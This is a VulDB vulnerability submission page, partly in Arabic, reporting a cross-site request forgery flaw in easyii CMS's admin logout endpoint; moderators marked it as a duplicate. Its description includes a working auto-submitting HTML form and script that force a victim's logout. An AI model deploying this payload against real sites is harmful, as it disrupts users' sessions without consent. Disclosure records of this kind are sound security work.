إرسال #189: CSRF in easyii CMS logoutالمعلومات

عنوانCSRF in easyii CMS logout
الوصفcan force logout any user with vulnerable endpoint: http://example.com/admin/sign/out and automate with auto submit form <form method='GET' action='http://example.com/admin/sign/out' target="csrf-frame" id="csrf-form"> <input type='hidden' name='criticaltoggle' value='true'> <input style="display:none;" type='submit' value='submit'> </form> <script>document.getElementById("csrf-form").submit()</script>
المصدر⚠️ https://github.com/noumo/easyii/
المستخدم
 rezaduty (UID 10530)
ارسال25/08/2020 05:22 PM (6 سنوات منذ)
الاعتدال26/08/2020 09:52 AM (17 hours later)
الحالةمكرر
إدخال VulDB160278 [easyii CMS /admin/sign/out تزوير طلبات عبر المواقع]
السببduplicate
النقاط0

التالي نظرة عامة السابق

Might our Artificial Intelligence support you?

Check our Alexa App!